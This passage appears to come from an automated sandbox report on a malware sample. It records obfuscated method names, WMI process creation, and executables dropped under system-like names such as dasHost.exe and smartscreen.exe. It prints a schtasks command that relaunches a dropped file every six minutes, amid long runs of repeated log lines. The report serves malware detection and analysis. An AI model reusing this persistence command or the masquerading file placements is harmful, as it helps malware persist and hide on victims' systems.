Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, gBtTmq3PGhiCHQ5uTvB.cs	High entropy of concatenated method names: 'L9NxAgYw9k', 'GrqE2xdqp66CXpVIa6S', 'rTQ89udbVRvUMhCy08v', 'Ai0vfVdCpZYNJ3FwLKe', 'tIPZ3Sd72iK4ZeKhP31', '_1fi', 'PIun4Pu2lu', '_676', 'IG9', 'mdP'
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, OvdRokmYIYJNNwrpeiQ.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'k5KEJSXM12jBb2D1gVF', 'nWGcBSXtnedAkwIdBiv', 'l0JORnXv745oSacxxG3', 'SoSBqaXINdMcTb6a0As', 'vh2LE4X83TBxOQ5CGoT', 'ir3CQwX3vJ8Foslk1by'
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, eVjtpx4P6bhPRspfeW.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'RQ1v4grYnhLm57FJyeo', 'ckg01qrS7xKIIiy6Jpv', 'jCZKXtrRjWG1kD9GLl1', 'w1PdVZryik9KE4Eq4Hp', 'H8w6p4rf2nmIrZtUCVb', 'sNV2vnr6cN6FYOwr7Fm'
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, pTNkIw0QWGLy1fPWaul.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe

Executable created and started: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe

Jump to behavior

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	File created: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Jump to dropped file
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Jump to dropped file
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	File created: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Jump to dropped file
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	File created: C:\Recovery\dasHost.exe	Jump to dropped file
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	File created: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Jump to dropped file

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe

File created: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 6 /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /f

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
